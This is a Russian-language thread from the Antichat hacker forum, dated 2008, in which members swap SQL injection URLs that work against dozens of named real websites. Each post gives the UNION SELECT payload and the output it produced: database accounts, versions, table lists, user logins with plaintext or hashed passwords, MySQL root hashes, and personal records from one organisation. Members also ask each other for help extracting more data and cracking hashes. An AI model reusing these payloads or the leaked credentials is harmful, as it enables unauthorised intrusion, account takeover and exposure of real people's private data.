ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4971  
Старый 02.03.2008, 00:45
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

привет всем!
нужна помощь в выводе базы данных, через information_schema.tables у меня невышло
получается вывести только USER(), DATABASE(), VERSION()
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*
 
Ответить с цитированием

  #4972  
Старый 02.03.2008, 01:39
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
привет всем!
нужна помощь в выводе базы данных, через information_schema.tables у меня невышло
получается вывести только USER(), DATABASE(), VERSION()
http://www.manhattan-receivers.com/modules/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*
1. не там запостил.
2. версия 4 -> information_schema в ней нету.
 
Ответить с цитированием

  #4973  
Старый 02.03.2008, 06:12
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

Видеоархив болельщиков ФК Спартак

http://www.video-soccer.com/section.php?sec=-15+union+select+concat_ws(0x9a,user(),database(),v ersion())/*

VIDEOSOB@LINHOST209.PROD.MESA1.SECURESERVER.NET
VIDEOSOB
4.0.27-


//**************************

Белгородская торгово промышленная палата
Выставочный комплекс "Белэкспоцентр"

http://belexpocentr.ru/show.php?id=-89+union+select+1,2,3,4,5,concat_ws(char(47),user( ),database(),version()),7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21/*

belexpocentr@localhost
www_belexpocentr_ru
5.0.44

открыта база INFORMATION_SCHEMA

//**************************

Всеукраинская молодежная организация “Союз молоді регіонів України”.

http://smru.com.ua/news.php?type=n&num=-2054+union+select+1,Concat_ws(char(58),last,first, otch,birthday,educ,inst,spec,work,post,region,raio n,town,street,dom,kv,hphone,wphone,mphone,ser,num, kem,kogda),3,4,5+from+smrucom_smru.enter+limit+1+o ffset+0/*

//***************************

AMT&C - лидер Российского рынка магнитных материалов и технологий

http://www.ndfeb.ru/news.php?act=news&num=-53+union+select+1,2,user(),database(),5,6,version( )/*

00146026@localhost
db00146026
4.1.21-log

//**************************

http://www.wellness-hall.ru/news.php?num=-4+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5/*

u39784@10.10.223.205
u39784
5.0.45-log

//************************

http://www.keckobservatory.org/article.php?id=-46+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11/*

root@localhost
keck
4.1.21

//**********************
Украинский готический портал

http://gothic.kiev.ua/ukrrus/reviews/show.php?id=226'+and+1=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,DataBase(),user(),16,17,18,19/*

4.1.22-log
gothicdb
gothic@hosting03.iptelecom.net.ua


p.s. Вот че я сегодня за ночь накопал
Всем привет

Последний раз редактировалось neon_fx; 02.03.2008 в 16:50..
 
Ответить с цитированием

  #4974  
Старый 02.03.2008, 16:00
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Код:
http://www.zycie.czest.pl/modules/show.php?id=0x35333927%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9/*
zycie@localhost:zycie:5.0.33-log
Код:
http://www.sudguru.com/show.php?x=1&at=1&sn=0x3127%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/*
sudee_g@localhost:sudee_s:4.1.22-standard 6
Код:
http://medhavi.edu.np/show.php?sn=0x3127%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/*
medhavi_sunil@localhost:medhavi_sunil:4.1.22-standard
Код:
http://perplexus.info/show.php?pid=2343&cid=0x313733373327%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10/*
www@localhost: perplexus:4.0.21-standard
Код:
http://linkdump.be/index.php?y=2004&m=0x3627%20union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8/*
kwaadblo_dumpmas@localhost:kwaadblo_linkdump:4.1.2 2-standard
Код:
http://www.cuplfil.com/english/show.php?ArticleID=0x313827%20union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18/*
root@localhost:zhengfa_en:4.0.14-max-nt
Код:
http://www.ihrc.org.uk/show.php?id=0x3137353427%20union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13/*
dbo120565932@212.227.119.149:db120565932:4.0.27-standard-log
Код:
http://www.flugzeugbilder.de/show.php?id=0x31323332333827%20union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
pp@localhost:fb:4.0.21-Max-log
Код:
http://www.newmedicine.pl/show.php?ktory=0x343027%20union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Код:
http://www.pnmedycznych.pl/show.php?ktory=0x393227%20union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Код:
http://www.nowapediatria.pl/show.php?ktory=0x3127%20union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Код:
http://www.nowamedycyna.pl/show.php?ktory=0x3127%20union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14/*
515707HQWV038@www4:515707HQWV038:4.1.22-standard-log
Ну вот так вот
 
Ответить с цитированием

  #4975  
Старый 02.03.2008, 18:54
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

CJLO.com
Цитата:
http://www.cjlo.com/magazine/features.php?ID=99999+union+select+1,VERSION(),3,4 ,5,6,7,8,9,10/*
VERSION: 4.1.21-log
DATABASE: cjlocom
USER: cjlocom@localhost

iqmagazineonline.com
Цитата:
http://www.iqmagazineonline.com/issue.php?crumb=ARCHIVE&id=99999+union+select+1,2, 3,4,5,VERSION(),7,8,9/*
VERSION: 4.1.20
DATABASE: iqmag
USER: iqmag@localhost

hdtvmagazine.com
Цитата:
http://www.hdtvmagazine.com/programming/guide-station.php?id=99999+union+select+1,2,VERSION(),4, 5,6,7,8,9,10,11,12,13,14,15/*
VERSION: 4.1.20-standard-log
DATABASE: main
USER: hdtv_web@localhost
//вывод в title


OUR-KIEV.com
Цитата:
http://our-kiev.com/banks/details.php?id=99999+union+select+1,VERSION(),3,4, 5,6,7,8,9,10/*
VERSION: 5.0.41-community
USER: ourkiev_ourkiev@localhost
DATABASE: ourkiev_main

banksandbrokersfootball.co.uk
Цитата:
http://www.banksandbrokersfootball.co.uk/news.php?id=99999+union+select+1,VERSION(),3,4,5,6 ,7/*
VERSION: 4.0.24_Debian-10sarge2-log
USER: web176u1@localhost
DATABASE: web176db1

outerbanksbeach.com
Цитата:
http://www.outerbanksbeach.com/listings.php?id=99999+union+select+1,USER(),3,4,5, 6,7,8,9,10,11/*
VERSION: 4.1.20
DATABASE: outerbanksbeach
USER: obbuser@localhost
 
Ответить с цитированием

  #4976  
Старый 02.03.2008, 20:03
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

ameritron.com кто доковыряет то молодец)
Цитата:
http://www.ameritron.com/products.php?catid=3+where+prod.id=3/*
thermatex.co.uk
Цитата:
http://www.thermatex.co.uk/products.php?CatID=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,concat_ws (0x3a,version(),user(),database()),5--
5.0.51-log:thermat_root@80.243.176.29:thermat_thermatex_c o_uk
Цитата:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
KEY_COLUMN_USAGE
USER_PRIVILEGES
VIEWS
oldreseller
tblcontent
tblprod
tblprodcat
tblprodold
tblprodtype
tblreseller
tbluser
Username
Password
UserType
id
nic:nac:Admin:1
bob1:robert:standard:2
bob2:robert:Admin:3
al:alb1genesis:admin:4
kupiteplo.ru
Цитата:
http://www.kupiteplo.ru/products.php?catid=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())--
4.1.21-log:00105446@localhost:db00105446
locksafe.com.au
Цитата:
http://www.locksafe.com.au/products.php?catId=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3--
4.1.20-log:locksafe@mysql.web.westnet.com.au:locksafe
blueovalindustries.com
Цитата:
http://www.blueovalindustries.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,0--
5.0.51a:webaccess@localhost:blueovalindustries
Цитата:
root:*6D2ADA5F6F4F9A257108D488A7270AE3B61543E9:Y:l ocalhost
root:*50A1A0ED3324F8FDBABD11942CE78F3261E2470E:Y:b luekey2.bluekeyinc.com
adm:*50A1A0ED3324F8FDBABD11942CE78F3261E2470E:Y:%
webaccess:*3834634CF62016AE9ADB081C643955D18109FB1 E:Y:localhost
keith:*3C2D7500AD57EFBCA3064D22BFE074A4CF1674F9:Y: %
newkirk_backup:*1B68D251DBE5F2053D62E070E3BE403D87 79FE23:Y:%
newwebaccess:*3C2D7500AD57EFBCA3064D22BFE074A4CF16 74F9:Y:secure.massresort.com
migrate:*1B68D251DBE5F2053D62E070E3BE403D8779FE23: N:64.34.179.15
servare:*1015954A8D4060B721936C7DE453BAD4E3AD4A27: Y:bluekey2.bluekeyinc.com
provenrepellents.com
Цитата:
http://www.provenrepellents.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat(username,char( 58),password,char(58),accountID,char(58),realname) +from+users+limit+3,1--
Цитата:
kelly:12144a6901bc651c826d1d6c613ab5db:0:Kelly Thornton
danny:307ce74f5fa0fb48a6fa4158147277c3:0aniel Beckley
randy:12144a6901bc651c826d1d6c613ab5db:0:Randy Atkins
anne:74563ba21a90da13dacf2a73e3ddefa7:0:Anne McMahon
realwheel.net
Цитата:
http://www.realwheel.net/products.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7, 8,9,10,1,2--
4.1.22-standard:realecg_dba@localhost:realecg_real
harvestsafe.com
Цитата:

http://www.harvestsafe.com/products.php?catID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database())--
5.0.51a:webaccess@localhost:bluekey2
Цитата:
root:*6D2ADA5F6F4F9A257108D488A7270AE3B61543E9:Y:l ocalhost
adam-rouilly.co.uk
Цитата:
http://www.adam-rouilly.co.uk/products.php?catid=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5--
4.1.22-standard:adam_adam@localhost:adam_adamrouilly
 
Ответить с цитированием

  #4977  
Старый 02.03.2008, 20:09
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

101.ru
Цитата:
http://www.101.ru/?an=guest_book&kw1=33'+union+select+1,2,3,4,5,6,7, 8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*
вывода не добился - а подбирать лень
 
Ответить с цитированием

  #4978  
Старый 02.03.2008, 20:33
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

www.finnews.ru ТИЦ сайтов: finnews.ru - 1300
http://www.finnews.ru/activity.php?id=50000+union+select+concat_ws(0x3a, username,user_password,user_email,user_icq)+from+p hpbb_users+limit+1,1/*

vsheff:f09dfc16c0947a6db07c337967b2634a:support@fi nnews.ru:99596309
хэш не брутится нифига и к аське не пдходит
 
Ответить с цитированием

  #4979  
Старый 02.03.2008, 20:35
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

159932
вот вывод ты со столбцами ошибся:
_http://www.101.ru/?an=guest_book&kw1=-33'+union+select+1,2,3,4,5,6,version(),8,user(),da tabase(),11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29/*
 
Ответить с цитированием

  #4980  
Старый 02.03.2008, 21:34
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

www.dom-zdorovja.ru
Код:
http://www.dom-zdorovja.ru/doc.php?id=0x3727%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6/*
domzdor7_alexey@localhost:domzdor7_shop:4.1.22-log

www.brendgoda.ru
Код:
http://brendgoda.ru/ru/news/index.php?id=0x363227%20union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10/*
bestbrand@localhost:bestbrand:4.1.22
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ